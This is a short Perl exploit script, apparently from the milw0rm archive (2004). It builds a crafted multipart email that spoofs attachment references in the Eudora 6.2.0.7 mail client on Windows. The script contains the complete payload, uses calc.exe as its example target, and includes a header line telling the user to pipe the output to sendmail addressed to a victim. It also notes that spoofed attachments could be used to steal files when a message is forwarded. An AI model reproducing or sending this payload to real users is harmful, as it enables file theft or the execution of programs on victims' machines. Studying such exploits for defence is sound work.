1 #!/usr/bin/perl −−
2
3
4 use MIME::Base64;
5
6
7 print "From: me\n";
8 print "To: you\n";
9 print "Subject: Eudora 6.2.0.7 on Windows spoof\n";
10 print "MIME−Version: 1.0\n";
11 print "Content−Type: multipart/mixed; boundary=\"zzz\"\n";
12 print "X−Use: Pipe the output of this script into: sendmail −i victim\n\n";
13
14
15 print "−−zzz\n";
16 print "Content−Type: text/plain\n";
17 print "Content−Transfer−Encoding: 7bit\n\n";
18 print "With spoofed attachments, we could ’steal’ files (after a warning?)
19
if the message was forwarded (not replied to).\n";
20
21
22 print "\n−−zzz\n";
23 print "Content−Type: text/html; name=\"qp.txt\"\n";
24 print "Content−Transfer−Encoding: quoted−printable \n";
25 print "Content−Disposition: inline; filename=\"qp.txt\"\n\n";
26 print "Within text/html part, use </x−html> to get back to plaintext,
27
no need for NUL or linebreak or nothing:
28 </x−html>\n";
29 print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n";
30 print "Attachment Converted=
31
: \"c:\\winnt\\system32\\calc.exe\"\n";
32 print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";
33
34
35 print "\n−−zzz−−\n";
36
37
38 # milw0rm.com [2004−10−11]
Page 1/1
Eudora 6.2.0.7 Attachment Spoofer Exploit
Paul Szabo
10/11/2004